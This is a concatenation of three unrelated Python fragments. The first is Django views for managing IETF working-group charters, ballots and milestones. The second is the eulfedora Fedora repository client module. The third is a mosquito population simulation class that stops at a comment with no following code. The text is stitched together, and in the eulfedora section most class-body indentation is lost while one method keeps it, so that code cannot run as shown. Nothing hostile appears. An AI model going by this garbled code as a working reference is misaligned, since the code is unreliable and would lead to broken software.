        return self.cleaned_data["content"].replace("\r", "")

    def clean_txt(self):
        return get_cleaned_text_file_content(self.cleaned_data["txt"])

    def save(self, group, rev):
        """Write the charter text for revision *rev* under CHARTER_PATH.

        An uploaded file takes precedence over the pasted text.
        """
        filename = os.path.join(settings.CHARTER_PATH, '%s-%s.txt' % (group.charter.canonical_name(), rev))
        with open(filename, 'wb') as destination:
            uploaded = self.cleaned_data['txt']
            if uploaded:
                destination.write(uploaded)
            else:
                destination.write(self.cleaned_data['content'].encode("utf-8"))
@role_required('Area Director','Secretariat')
def submit(request, name=None, acronym=None, option=None):
    """Upload a new revision of a charter document.

    The charter may be addressed by full document *name* or by group
    *acronym*. On success, either continues the start/stop process
    (when *option* is given) or returns to the document view.
    """
    # normalize the identifier into a full charter document name
    if name:
        if not name.startswith('charter-'):
            name = "charter-ietf-" + name
    elif acronym:
        name = "charter-ietf-" + acronym

    charter = get_object_or_404(Document, type="charter", name=name)
    group = charter.group
    login = request.user.get_profile()

    path = os.path.join(settings.CHARTER_PATH, '%s-%s.txt' % (charter.canonical_name(), charter.rev))
    not_uploaded_yet = charter.rev.endswith("-00") and not os.path.exists(path)

    if not_uploaded_yet:
        # this case is special - we recently chartered or rechartered and have no file yet
        next_rev = charter.rev
    else:
        # search history for possible collisions with abandoned efforts
        prev_revs = list(charter.history_set.order_by('-time').values_list('rev', flat=True))
        next_rev = next_revision(charter.rev)
        while next_rev in prev_revs:
            next_rev = next_revision(next_rev)

    if request.method == 'POST':
        form = UploadForm(request.POST, request.FILES)
        if form.is_valid():
            save_document_in_history(charter)
            # Also save group history so we can search for it
            save_group_in_history(group)

            charter.rev = next_rev

            e = NewRevisionDocEvent(doc=charter, by=login, type="new_revision")
            e.desc = "New version available: <b>%s-%s.txt</b>" % (charter.canonical_name(), charter.rev)
            e.rev = charter.rev
            e.save()

            # Save file on disk
            form.save(group, charter.rev)

            charter.time = datetime.datetime.now()
            charter.save()

            if option:
                return redirect('charter_startstop_process', name=charter.name, option=option)
            else:
                return redirect("doc_view", name=charter.name)
    else:
        init = { "content": ""}
        c = charter

        if not_uploaded_yet:
            # use text from last approved revision
            last_approved = charter.rev.split("-")[0]
            h = charter.history_set.filter(rev=last_approved).order_by("-time", "-id")
            if h:
                c = h[0]

        # prefill the textarea with the existing charter text, if readable
        filename = os.path.join(settings.CHARTER_PATH, '%s-%s.txt' % (c.canonical_name(), c.rev))
        try:
            with open(filename, 'r') as f:
                init["content"] = f.read()
        except IOError:
            pass
        form = UploadForm(initial=init)

    return render_to_response('wgcharter/submit.html',
                              {'form': form,
                               'next_rev': next_rev,
                               'group': group },
                              context_instance=RequestContext(request))
class AnnouncementTextForm(forms.Form):
    """Edit the text of a WG action or review announcement."""
    announcement_text = forms.CharField(widget=forms.Textarea, required=True)

    def clean_announcement_text(self):
        # strip carriage returns so stored text uses plain newlines
        return self.cleaned_data["announcement_text"].replace("\r", "")
@role_required('Area Director','Secretariat')
def announcement_text(request, name, ann):
    """Edit the action or review announcement text for a charter.

    *ann* selects which announcement is edited ("action" or "review").
    Supports saving edited text, regenerating the default text, and
    sending the announcement by mail.
    """
    charter = get_object_or_404(Document, type="charter", name=name)
    group = charter.group
    login = request.user.get_profile()

    # initialize so an unexpected *ann* value 404s instead of raising
    # a NameError below
    existing = None
    if ann in ("action", "review"):
        existing = charter.latest_event(WriteupDocEvent, type="changed_%s_announcement" % ann)
    if not existing:
        if ann == "action":
            existing = default_action_text(group, charter, login)
        elif ann == "review":
            existing = default_review_text(group, charter, login)
    if not existing:
        raise Http404

    form = AnnouncementTextForm(initial=dict(announcement_text=existing.text))

    if request.method == 'POST':
        form = AnnouncementTextForm(request.POST)
        if "save_text" in request.POST and form.is_valid():
            t = form.cleaned_data['announcement_text']
            if t != existing.text:
                e = WriteupDocEvent(doc=charter, by=login)
                e.by = login
                e.type = "changed_%s_announcement" % ann
                e.desc = "%s %s text was changed" % (group.type.name, ann)
                e.text = t
                e.save()

                charter.time = e.time
                charter.save()

            if request.GET.get("next", "") == "approve":
                return redirect('charter_approve', name=charter.canonical_name())

            return redirect('doc_writeup', name=charter.canonical_name())

        if "regenerate_text" in request.POST:
            if ann == "action":
                e = default_action_text(group, charter, login)
            elif ann == "review":
                e = default_review_text(group, charter, login)
            # make sure form has the updated text
            form = AnnouncementTextForm(initial=dict(announcement_text=e.text))

        if "send_text" in request.POST and form.is_valid():
            parsed_msg = send_mail_preformatted(request, form.cleaned_data['announcement_text'])
            # fixed typo in user-facing message: "Subjet" -> "Subject"
            messages.success(request, "The email To: '%s' with Subject: '%s' has been sent." % (parsed_msg["To"],parsed_msg["Subject"],))
            return redirect('doc_writeup', name=charter.name)

    return render_to_response('wgcharter/announcement_text.html',
                              dict(charter=charter,
                                   announcement=ann,
                                   back_url=urlreverse("doc_writeup", kwargs=dict(name=charter.name)),
                                   announcement_text_form=form,
                                   ),
                              context_instance=RequestContext(request))
class BallotWriteupForm(forms.Form):
    """Edit the ballot write-up text for a charter ballot."""
    ballot_writeup = forms.CharField(widget=forms.Textarea, required=True)

    def clean_ballot_writeup(self):
        # strip carriage returns so stored text uses plain newlines
        return self.cleaned_data["ballot_writeup"].replace("\r", "")
@role_required('Area Director','Secretariat')
def ballot_writeupnotes(request, name):
    """Editing of ballot write-up and notes.

    Saves the write-up text and, on "send_ballot", mails the ballot
    announcement (recording the sending AD's position as "yes" if not
    already recorded) and shows a confirmation page.
    """
    charter = get_object_or_404(Document, type="charter", name=name)

    ballot = charter.latest_event(BallotDocEvent, type="created_ballot")
    if not ballot:
        raise Http404()

    login = request.user.get_profile()

    approval = charter.latest_event(WriteupDocEvent, type="changed_action_announcement")

    existing = charter.latest_event(WriteupDocEvent, type="changed_ballot_writeup_text")
    if not existing:
        # no saved write-up yet: generate a default one
        existing = generate_ballot_writeup(request, charter)

    reissue = charter.latest_event(DocEvent, type="sent_ballot_announcement")

    form = BallotWriteupForm(initial=dict(ballot_writeup=existing.text))

    if request.method == 'POST' and ("save_ballot_writeup" in request.POST or "send_ballot" in request.POST):
        form = BallotWriteupForm(request.POST)
        if form.is_valid():
            t = form.cleaned_data["ballot_writeup"]
            if t != existing.text:
                e = WriteupDocEvent(doc=charter, by=login)
                e.by = login
                e.type = "changed_ballot_writeup_text"
                e.desc = "Ballot writeup was changed"
                e.text = t
                e.save()

            # sending requires an approval (action announcement) to exist
            if "send_ballot" in request.POST and approval:
                if has_role(request.user, "Area Director") and not charter.latest_event(BallotPositionDocEvent, type="changed_ballot_position", ad=login, ballot=ballot):
                    # sending the ballot counts as a yes
                    pos = BallotPositionDocEvent(doc=charter, by=login)
                    pos.type = "changed_ballot_position"
                    pos.ad = login
                    pos.pos_id = "yes"
                    pos.desc = "[Ballot Position Update] New position, %s, has been recorded for %s" % (pos.pos.name, pos.ad.plain_name())
                    pos.save()

                msg = generate_issue_ballot_mail(request, charter, ballot)
                send_mail_preformatted(request, msg)

                e = DocEvent(doc=charter, by=login)
                e.by = login
                e.type = "sent_ballot_announcement"
                e.desc = "Ballot has been sent"
                e.save()

                return render_to_response('wgcharter/ballot_issued.html',
                                          dict(doc=charter,
                                               ),
                                          context_instance=RequestContext(request))

    return render_to_response('wgcharter/ballot_writeupnotes.html',
                              dict(charter=charter,
                                   ballot_issued=bool(charter.latest_event(type="sent_ballot_announcement")),
                                   ballot_writeup_form=form,
                                   reissue=reissue,
                                   approval=approval,
                                   ),
                              context_instance=RequestContext(request))
@role_required("Secretariat")
def approve(request, name):
    """Approve charter, changing state, fixing revision, copying file to final location."""
    charter = get_object_or_404(Document, type="charter", name=name)
    group = charter.group

    login = request.user.get_profile()

    e = charter.latest_event(WriteupDocEvent, type="changed_action_announcement")
    if not e:
        announcement = default_action_text(group, charter, login).text
    else:
        announcement = e.text

    if request.method == 'POST':
        new_charter_state = State.objects.get(used=True, type="charter", slug="approved")
        prev_charter_state = charter.get_state()

        save_document_in_history(charter)
        charter.set_state(new_charter_state)
        close_open_ballots(charter, login)

        # approve
        e = DocEvent(doc=charter, by=login)
        e.type = "iesg_approved"
        e.desc = "IESG has approved the charter"
        e.save()

        change_description = e.desc

        # activate the group if it was not already active
        new_state = GroupStateName.objects.get(slug="active")
        if group.state != new_state:
            save_group_in_history(group)
            prev_state = group.state
            group.state = new_state
            group.time = e.time
            group.save()

            # create an event for the wg state change, too
            e = ChangeStateGroupEvent(group=group, type="changed_state")
            e.time = group.time
            e.by = login
            e.state_id = "active"
            e.desc = "Charter approved, group active"
            e.save()

            change_description += " and %s state has been changed to %s" % (group.type.name, new_state.name)

        e = log_state_changed(request, charter, login, prev_charter_state)

        # according to spec, 00-02 becomes 01, so copy file and record new revision
        try:
            old = os.path.join(charter.get_file_path(), '%s-%s.txt' % (charter.canonical_name(), charter.rev))
            new = os.path.join(charter.get_file_path(), '%s-%s.txt' % (charter.canonical_name(), next_approved_revision(charter.rev)))
            shutil.copy(old, new)
        except IOError:
            return HttpResponse("There was an error copying %s to %s" %
                                ('%s-%s.txt' % (charter.canonical_name(), charter.rev),
                                 '%s-%s.txt' % (charter.canonical_name(), next_approved_revision(charter.rev))))

        e = NewRevisionDocEvent(doc=charter, by=login, type="new_revision")
        e.rev = next_approved_revision(charter.rev)
        e.desc = "New version available: <b>%s-%s.txt</b>" % (charter.canonical_name(), e.rev)
        e.save()

        charter.rev = e.rev
        charter.time = e.time
        charter.save()

        email_secretariat(request, group, "state-%s" % new_charter_state.slug, change_description)

        # move milestones over
        milestones_to_delete = list(group.groupmilestone_set.filter(state__in=("active", "review")))
        for m in group.groupmilestone_set.filter(state="charter"):
            # see if we got this milestone already (i.e. it was copied
            # verbatim to the charter)
            found = False
            for i, o in enumerate(milestones_to_delete):
                if o.desc == m.desc and o.due == m.due and set(o.docs.all()) == set(m.docs.all()):
                    found = True
                    break

            if found:
                # keep existing, whack charter milestone
                if not o.state_id == "active":
                    save_milestone_in_history(o)
                    o.state_id = "active"
                    o.save()
                    MilestoneGroupEvent.objects.create(
                        group=group, type="changed_milestone", by=login,
                        desc="Changed milestone \"%s\", set state to active from review" % o.desc,
                        milestone=o)
                del milestones_to_delete[i]

                # don't generate a DocEvent for this, it's implicit in the approval event
                save_milestone_in_history(m)
                m.state_id = "deleted"
                m.save()
            else:
                # move charter milestone
                save_milestone_in_history(m)
                m.state_id = "active"
                m.save()
                MilestoneGroupEvent.objects.create(
                    group=group, type="changed_milestone", by=login,
                    desc="Added milestone \"%s\", due %s, from approved charter" % (m.desc, m.due),
                    milestone=m)

        # any remaining active/review milestones were not in the
        # approved charter: delete them
        for m in milestones_to_delete:
            save_milestone_in_history(m)
            m.state_id = "deleted"
            m.save()
            MilestoneGroupEvent.objects.create(
                group=group, type="changed_milestone", by=login,
                desc="Deleted milestone \"%s\", not present in approved charter" % m.desc,
                milestone=m)

        # send announcement
        send_mail_preformatted(request, announcement)

        return HttpResponseRedirect(charter.get_absolute_url())

    return render_to_response('wgcharter/approve.html',
                              dict(charter=charter,
                                   announcement=announcement),
                              context_instance=RequestContext(request))
def charter_with_milestones_txt(request, name, rev):
    """Render a plain-text view of charter revision *rev* together with
    the milestones that applied to that revision."""
    charter = get_object_or_404(Document, type="charter", docalias__name=name)

    revision_event = charter.latest_event(NewRevisionDocEvent, type="new_revision", rev=rev)
    if not revision_event:
        return HttpResponseNotFound("Revision %s not found in database" % rev)

    # read charter text
    c = find_history_active_at(charter, revision_event.time) or charter
    filename = '%s-%s.txt' % (c.canonical_name(), rev)

    charter_text = ""

    try:
        with open(os.path.join(settings.CHARTER_PATH, filename), 'r') as f:
            # decode leniently: legacy files may contain stray bytes
            charter_text = unicode(f.read(), errors='ignore')
    except IOError:
        charter_text = "Error reading charter text %s" % filename

    milestones = historic_milestones_for_charter(charter, rev)

    # wrap the output nicely
    wrapper = textwrap.TextWrapper(initial_indent="", subsequent_indent=" " * 11, width=80, break_long_words=False)
    for m in milestones:
        m.desc_filled = wrapper.fill(m.desc)

    return render_to_response('wgcharter/charter_with_milestones.txt',
                              dict(charter_text=charter_text,
                                   milestones=milestones),
                              context_instance=RequestContext(request),
                              mimetype="text/plain")
| |
# file eulfedora/server.py
#
# Copyright 2010,2011 Emory University Libraries
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
:class:`eulfedora.server.Repository` has the capability to
automatically use connection configuration parameters pulled from
Django settings, when available, but it can also be used without Django.
When you create an instance of :class:`~eulfedora.server.Repository`,
if you do not specify connection parameters, it will attempt to
initialize the repository connection based on Django settings, using
the configuration names documented below.
If you are writing unit tests that use :mod:`eulfedora`, you may want
to take advantage of
:class:`eulfedora.testutil.FedoraTestSuiteRunner`, which has logic to
set up and switch configurations between a development fedora
repository and a test repository.
Projects that use this module should include the following settings in their
``settings.py``::
# Fedora Repository settings
FEDORA_ROOT = 'http://fedora.host.name:8080/fedora/'
FEDORA_USER = 'user'
FEDORA_PASSWORD = 'password'
FEDORA_PIDSPACE = 'changeme'
FEDORA_TEST_ROOT = 'http://fedora.host.name:8180/fedora/'
FEDORA_TEST_PIDSPACE = 'testme'
# optional retry setting (default is 3)
FEDORA_CONNECTION_RETRIES = None
If username and password are not specified, the Repository instance
will be initialized without credentials and access Fedora as an
anonymous user. If pidspace is not specified, the Repository will use
the default pidspace for the configured Fedora instance.
Projects that need unit test setup and clean-up tasks (syncrepo and
test object removal) to access Fedora with different credentials than
the configured Fedora credentials should use the following settings::
FEDORA_TEST_USER = 'testuser'
FEDORA_TEST_PASSWORD = 'testpassword'
----
"""
from __future__ import unicode_literals
import logging
import requests
import warnings
import six
from eulfedora.rdfns import model as modelns
from eulfedora.api import ApiFacade, ResourceIndex
from eulfedora.models import DigitalObject
from eulfedora.util import parse_xml_object
from eulfedora.xml import SearchResults, NewPids
logger = logging.getLogger(__name__)
# a repository object, basically a handy facade for easy api access
class Repository(object):
"""Pythonic interface to a single Fedora Commons repository instance.
Connect to a single Fedora Repository by passing in connection
parameters or based on configuration in a Django settings file.
If username and password are specified, they will override any
    fedora credentials configured in Django settings.
If a request object is passed in and the user is logged in, this
class will look for credentials in the session, as set by
:meth:`~eulcore.django.fedora.views.login_and_store_credentials_in_session`
(see method documentation for more details and potential security
risks).
Order of precedence for credentials:
* If a request object is passed in and user credentials are
available in the session, that will be used first.
* Explicit username and password parameters will be used next.
      * If none of these options are available, fedora credentials
        set in django settings will be used.
If a *retries* value is specified, this will override the default
set in :attr:`Repository.retries` which is used to configure the
maximum number of requests retries for connection errors (see
http://docs.python-requests.org/en/master/api/#requests.adapters.HTTPAdapter).
Retries can also be specified via Django settings as
    **FEDORA_CONNECTION_RETRIES**; if an initialization parameter is specified,
that will override the Django setting.
"""
default_object_type = DigitalObject
"Default type to use for methods that return fedora objects - :class:`DigitalObject`"
default_pidspace = None
#: default number of retries to request for API connections; see
#: http://docs.python-requests.org/en/master/api/#requests.adapters.HTTPAdapter
retries = 3
default_retry_option = object()
# default retry option, so None can be recognized as an option
search_fields = [
'pid', 'label', 'state', 'ownerId', 'cDate', 'mDate',
'dcmDate', 'title', 'creator', 'subject', 'description', 'publisher',
'contributor', 'date', 'type', 'format', 'identifier', 'source',
'language', 'relation', 'coverage', 'rights']
"fields that can be searched against in :meth:`find_objects`"
search_fields_aliases = {
'owner': 'ownerId',
'created': 'cDate',
'modified': 'mDate',
'dc_modified': 'dcmDate'
}
"human-readable aliases for oddly-named fedora search fields"
    def __init__(self, root=None, username=None, password=None, request=None,
                 retries=default_retry_option):
        """Initialize the repository connection.

        Connection parameters not passed explicitly are pulled from
        Django settings when Django is importable; see the class
        docstring for the credential precedence rules.
        """
        # when initialized via django, settings should be pulled from django conf
        if root is None:
            try:
                from django.conf import settings
                from eulfedora import cryptutil

                root = getattr(settings, 'FEDORA_ROOT', None)
                if root is None:
                    raise Exception('Cannot initialize a Fedora connection without specifying ' +
                                    'Fedora root url directly or in Django settings as FEDORA_ROOT')

                # if username and password are not set, attempt to pull from django conf
                if username is None and password is None:
                    # NOTE(review): FEDORA_PASSWORD_SESSION_KEY is referenced
                    # but not defined in this part of the module -- confirm it
                    # is defined/imported elsewhere in the file. Also,
                    # request.user.is_authenticated is used as an attribute;
                    # on older Django versions it is a method -- verify the
                    # supported Django versions.
                    if request is not None and request.user.is_authenticated and \
                       FEDORA_PASSWORD_SESSION_KEY in request.session:
                        username = request.user.username
                        password = cryptutil.decrypt(request.session[FEDORA_PASSWORD_SESSION_KEY])

                    if username is None and hasattr(settings, 'FEDORA_USER'):
                        username = settings.FEDORA_USER
                        if password is None and hasattr(settings, 'FEDORA_PASSWORD'):
                            password = settings.FEDORA_PASSWORD

                if hasattr(settings, 'FEDORA_PIDSPACE'):
                    self.default_pidspace = settings.FEDORA_PIDSPACE

                # if retries is specified in
                if hasattr(settings, 'FEDORA_CONNECTION_RETRIES'):
                    self.retries = settings.FEDORA_CONNECTION_RETRIES

            except ImportError:
                # Django not installed: fall through and rely on the
                # explicit parameters only
                pass

        # if retries is specified in init options, that should override
        # default value or django setting
        if retries is not self.default_retry_option:
            self.retries = retries

        if root is None:
            raise Exception('Could not determine Fedora root url from django settings or parameter')

        logger.debug("Connecting to fedora at %s %s", root,
                     'as %s' % username if username
                     else '(no user credentials)')
        self.api = ApiFacade(root, username, password)
        self.fedora_root = self.api.base_url

        self.username = username
        self.password = password
        # ResourceIndex is created lazily by the risearch property
        self._risearch = None
@property
def risearch(self):
"instance of :class:`eulfedora.api.ResourceIndex`, with the same root url and credentials"
if self._risearch is None:
self._risearch = ResourceIndex(self.fedora_root, self.username, self.password)
return self._risearch
def get_next_pid(self, namespace=None, count=None):
"""
Request next available pid or pids from Fedora, optionally in a specified
namespace. Calls :meth:`ApiFacade.getNextPID`.
.. deprecated :: 0.14
Mint pids for new objects with
:func:`eulfedora.models.DigitalObject.get_default_pid`
instead, or call :meth:`ApiFacade.getNextPID` directly.
:param namespace: (optional) get the next pid in the specified pid namespace;
otherwise, Fedora will return the next pid in the configured default namespace.
:param count: (optional) get the specified number of pids; by default, returns 1 pid
:rtype: string or list of strings
"""
# this method should no longer be needed - default pid logic moved to DigitalObject
warnings.warn("""get_next_pid() method is deprecated; you should mint new pids via DigitalObject or ApiFacade.getNextPID() instead.""",
DeprecationWarning)
kwargs = {}
if namespace:
kwargs['namespace'] = namespace
elif self.default_pidspace:
kwargs['namespace'] = self.default_pidspace
if count:
kwargs['numPIDs'] = count
r = self.api.getNextPID(**kwargs)
nextpids = parse_xml_object(NewPids, r.content, r.url)
if count is None:
return nextpids.pids[0]
else:
return nextpids.pids
def ingest(self, text, log_message=None):
"""
Ingest a new object into Fedora. Returns the pid of the new object on
success. Calls :meth:`ApiFacade.ingest`.
:param text: full text content of the object to be ingested
:param log_message: optional log message
:rtype: string
"""
kwargs = {'text': text}
if log_message:
kwargs['logMessage'] = log_message
response = self.api.ingest(**kwargs)
return response.content
def purge_object(self, pid, log_message=None):
"""
Purge an object from Fedora. Calls :meth:`ApiFacade.purgeObject`.
:param pid: pid of the object to be purged
:param log_message: optional log message
:rtype: boolean
"""
kwargs = {'pid': pid}
if log_message:
kwargs['logMessage'] = log_message
response = self.api.purgeObject(**kwargs)
return response.status_code == requests.codes.ok
def get_objects_with_cmodel(self, cmodel_uri, type=None):
"""
Find objects in Fedora with the specified content model.
:param cmodel_uri: content model URI (should be full URI in info:fedora/pid:### format)
:param type: type of object to return (e.g., class:`DigitalObject`)
:rtype: list of objects
"""
uris = self.risearch.get_subjects(modelns.hasModel, cmodel_uri)
return [self.get_object(uri, type) for uri in uris]
def get_object(self, pid=None, type=None, create=None):
"""
Initialize a single object from Fedora, or create a new one, with the
same Fedora configuration and credentials.
:param pid: pid of the object to request, or a function that can be
called to get one. if not specified, :meth:`get_next_pid`
will be called if a pid is needed
:param type: type of object to return; defaults to :class:`DigitalObject`
:rtype: single object of the type specified
:create: boolean: create a new object? (if not specified, defaults
to False when pid is specified, and True when it is not)
"""
objtype = type or self.default_object_type
if pid is None:
if create is None:
create = True
else:
if create is None:
create = False
return objtype(self.api, pid, create,
default_pidspace=self.default_pidspace)
def infer_object_subtype(self, api, pid=None, create=False, default_pidspace=None):
"""Construct a DigitalObject or appropriate subclass, inferring the
appropriate subtype using :meth:`best_subtype_for_object`. Note that
this method signature has been selected to match the
:class:`~eulfedora.models.DigitalObject` constructor so that this
method might be passed directly to :meth:`get_object` as a `type`::
>>> obj = repo.get_object(pid, type=repo.infer_object_subtype)
See also: :class:`TypeInferringRepository`
"""
obj = DigitalObject(api, pid, create, default_pidspace)
if create:
return obj
if not obj.exists:
return obj
match_type = self.best_subtype_for_object(obj)
return match_type(api, pid)
def best_subtype_for_object(self, obj, content_models=None):
"""Given a :class:`~eulfedora.models.DigitalObject`, examine the
object to select the most appropriate subclass to instantiate. This
generic implementation examines the object's content models and
compares them against the defined subclasses of
:class:`~eulfedora.models.DigitalObject` to pick the best match.
Projects that have a more nuanced understanding of their particular
objects should override this method in a :class:`Repository`
subclass. This method is intended primarily for use by
:meth:`infer_object_subtype`.
:param obj: a :class:`~eulfedora.models.DigitalObject` to inspect
:param content_models: optional list of content models, if they are known
ahead of time (e.g., from a Solr search result), to avoid
an additional Fedora look-up
:rtype: a subclass of :class:`~eulfedora.models.DigitalObject`
"""
if content_models is None:
obj_models = set(str(m) for m in obj.get_models())
else:
obj_models = content_models
# go through registered DigitalObject subtypes looking for what type
# this object might be. use the first longest match: that is, look
# for classes we qualify for by having all of their cmodels, and use
# the class with the longest set of cmodels. if there's a tie, warn
# and pick one.
# TODO: store these at registration in a way that doesn't require
# this manual search every time
# TODO: eventually we want to handle the case where a DigitalObject
# can use multiple unrelated cmodels, though we need some major
# changes beyond here to support that
match_len, matches = 0, []
for obj_type in DigitalObject.defined_types.values():
type_model_list = getattr(obj_type, 'CONTENT_MODELS', None)
if not type_model_list:
continue
type_models = set(type_model_list)
if type_models.issubset(obj_models):
if len(type_models) > match_len:
match_len, matches = len(type_models), [obj_type]
elif len(type_models) == match_len:
matches.append(obj_type)
if not matches:
return DigitalObject
if len(matches) > 1:
# Check to see if there happens to be an end subclass to the list of matches.
for obj_type in matches:
is_root_subclass = True
for possible_parent_type in matches:
if not issubclass(obj_type, possible_parent_type):
is_root_subclass = False
if is_root_subclass:
return obj_type
logger.warn('%s has %d potential classes with no root subclass for the list. using the first: %s',
obj, len(matches), repr(matches))
return matches[0]
def find_objects(self, terms=None, type=None, chunksize=None, **kwargs):
"""
Find objects in Fedora. Find query should be generated via keyword
args, based on the fields in Fedora documentation. By default, the
query uses a contains (~) search for all search terms. Calls
:meth:`ApiFacade.findObjects`. Results seem to return consistently
in ascending PID order.
Example usage - search for all objects where the owner contains 'jdoe'::
repository.find_objects(ownerId='jdoe')
Supports all search operators provided by Fedora findObjects query (exact,
gt, gte, lt, lte, and contains). To specify the type of query for
a particular search term, call find_objects like this::
repository.find_objects(ownerId__exact='lskywalker')
repository.find_objects(date__gt='20010302')
:param type: type of objects to return; defaults to :class:`DigitalObject`
:param chunksize: number of objects to return at a time
:rtype: generator for list of objects
"""
type = type or self.default_object_type
find_opts = {'chunksize' : chunksize}
search_operators = {
'exact': '=',
'gt': '>',
'gte': '>=',
'lt': '<',
'lte': '<=',
'contains': '~'
}
if terms is not None:
find_opts['terms'] = terms
else:
conditions = []
for field, value in six.iteritems(kwargs):
if '__' in field:
field, filtr = field.split('__')
if filtr not in search_operators:
raise Exception("Unsupported search filter '%s'" % filtr)
op = search_operators[filtr]
else:
op = search_operators['contains'] # default search mode
if field in self.search_fields_aliases:
field = self.search_fields_aliases[field]
if field not in self.search_fields:
raise Exception("Error generating Fedora findObjects query: unknown search field '%s'" \
% field)
if ' ' in value:
# if value contains whitespace, it must be delimited with single quotes
value = "'%s'" % value
conditions.append("%s%s%s" % (field, op, value))
query = ' '.join(conditions)
find_opts['query'] = query
r = self.api.findObjects(**find_opts)
chunk = parse_xml_object(SearchResults, r.content, r.url)
while True:
for result in chunk.results:
yield type(self.api, result.pid)
if chunk.session_token:
r = self.api.findObjects(session_token=chunk.session_token, **find_opts)
chunk = parse_xml_object(SearchResults, r.content, r.url)
else:
break
class TypeInferringRepository(Repository):
    """A simple :class:`Repository` subclass whose default object type for
    :meth:`~Repository.get_object` is
    :meth:`~Repository.infer_object_subtype`. Thus, each call to
    :meth:`~Repository.get_object` on a repository such as this will
    automatically use :meth:`~Repository.best_subtype_for_object` (or a
    subclass override) to infer the object's proper type.
    """
    # Accessed through an instance in get_object, this function attribute
    # binds as a method, so infer_object_subtype receives self implicitly.
    default_object_type = Repository.infer_object_subtype
# session key for storing a user password that will be used for Fedora access
# - used here and in eulcore.django.fedora.views
FEDORA_PASSWORD_SESSION_KEY = 'eulfedora_password'
| |
import random as rd
import matplotlib.pyplot as plt
from mpl_toolkits.axes_grid1 import make_axes_locatable
plt.style.use("ggplot")
from math import *
import numpy as np
import pickle as pkl
import skimage as ski
from skimage.color import rgb2gray
from scipy import misc
from PIL import Image
import PIL.ImageOps
from skimage.exposure import adjust_gamma
from randomwalkmaker import *
class Cell:
    """One grid cell of the mosquito simulation.

    Holds the wild-type population in each life stage, the GMO-mutant
    sub-populations, and the daily transition/death probabilities used by
    :meth:`update` to advance the difference-equation model one day.
    """

    def __init__(self, pop_list, veg_type, veg_value, hum_value, iswater, pixelXmeters, poplim_perkm2, gmotype):
        """
        :param pop_list: numpy array of the six wild-type stage counts
            [eggs, larvae, pupae, host-seeking, resting, ovoposition-seeking]
        :param veg_type: vegetation/land-use type of this pixel
        :param veg_value: vegetation index value
        :param hum_value: humidity index value
        :param iswater: 1 if this pixel is water, 0 otherwise
        :param pixelXmeters: pixel edge length in meters
        :param poplim_perkm2: larvae carrying capacity per square km
        :param gmotype: fitness multiplier applied to mutant larval development
        """
        # carrying capacity for this pixel: per-km2 limit scaled by humidity
        # and pixel area (m^2 -> km^2)
        self.larvae_lim_per_box = poplim_perkm2*hum_value*(pixelXmeters**2)/1000000
        self.pop_list = pop_list
        self.veg_type = veg_type
        self.veg_value = veg_value
        self.hum_value = hum_value
        self.iswater = iswater
        self.gmotype = gmotype
        self.e = pop_list[0]   # eggs - aquatic stage
        self.l = pop_list[1]   # larvae - aquatic stage
        self.p = pop_list[2]   # pupae - aquatic stage
        self.ah = pop_list[3]  # host-seeking adults
        self.ar = pop_list[4]  # resting adults
        self.ao = pop_list[5]  # ovoposition-seeking adults
        # NOTE(review): males start as the sum of all adult females --
        # presumably a 1:1 sex-ratio assumption; confirm with model source
        self.amale = sum(pop_list[3:])
        self.emut = 0  # mutant eggs
        self.lmut = 0  # mutant larvae
        self.pmut = 0  # mutant pupae
        self.amut = 0  # mutant adults
        self.n_total = pop_list.sum()
        self.n_aquatic = sum(pop_list[0:3])
        self.n_adult = sum(pop_list[3:])
        # daily rates: U* = probability of dying, P* = probability of
        # passing on to the next stage
        self.B = 100        # number of eggs per ovoposition
        self.PE = .50       # prob of egg becoming a larva
        self.UE = .56       # prob of dying as an egg
        self.novopo = 1.3   # ovopositions per day (max = 1.48, max efficient = 1.4)
        self.UL1 = .44      # prob of dying as a larva
        self.UL2 = .1       # prob of dying due to crowding (currently unused in update)
        self.PL = 0.14      # prob of larva becoming a pupa
        self.PP = .50       # prob of pupa emerging as adult
        self.UP = .37       # prob of dying as a pupa
        self.PAH = .46
        self.UAH = .18
        self.PAR = .43
        self.UAR = .0043
        self.UAO = .41
        self.PAO = .5
        self.UAM = .15      # daily male mortality

    def update(self):
        """Advance this cell's populations one day via the difference
        equations; negative populations are clamped to zero afterwards.

        Fixes over the original: drops an unused local (``b``), drops a dead
        ``pop_list.tolist()`` conversion (the list was never read before the
        array was rebuilt), and reuses the ``allmale`` sum instead of
        recomputing it.
        """
        # logistic crowding factor for larval development: 0 at or above
        # the carrying capacity
        crowding = 0
        if self.l < self.larvae_lim_per_box:
            crowding = (1 - (self.l + self.lmut)/self.larvae_lim_per_box)
        allmale = self.amale + self.amut
        if allmale != 0:
            factor = self.amale/allmale  # share of eggs fathered by wild males
            mutfactor = (1 - factor)     # share fathered by mutant males
        else:
            factor = 0
            mutfactor = 0
        deltae = self.PAO*self.B*self.novopo*self.ao*factor - self.e*self.UE - self.e*self.PE  # egg update
        deltal = self.PE*self.e - self.l*self.UL1 - self.l*self.PL*crowding  # larvae update
        deltap = self.PL*self.l*crowding - self.p*self.UP - self.p*self.PP  # pupae update
        deltaah = self.PP*self.p/2 - self.ah*self.UAH - self.ah*self.PAH + self.PAO*self.ao  # host-seeking update
        deltaar = self.PAH*self.ah - self.ar*self.UAR - self.ar*self.PAR  # resting update
        deltaao = self.ar*self.PAR - self.PAO*self.ao - self.UAO*self.ao  # ovoposition-seeking update
        deltaamale = self.PP*self.p/2 - self.amale*self.UAM  # males: half of emerging pupae
        deltaemut = self.PAO*self.B*self.novopo*self.ao*mutfactor - self.emut*self.UE - self.emut*self.PE  # mutant eggs
        deltalmut = self.PE*self.emut - self.lmut*self.UL1 - self.lmut*self.PL*crowding*self.gmotype  # mutant larvae
        deltapmut = self.PL*self.lmut*crowding*self.gmotype - self.pmut*self.UP - self.pmut*self.PP  # mutant pupae
        deltaamut = self.PP*self.pmut - self.amut*self.UAM  # mutant adults
        self.e += deltae
        self.l += deltal
        self.p += deltap
        self.ah += deltaah
        self.ar += deltaar
        self.ao += deltaao
        self.amale += deltaamale
        self.emut += deltaemut
        self.lmut += deltalmut
        self.pmut += deltapmut
        self.amut += deltaamut
        # populations cannot go negative
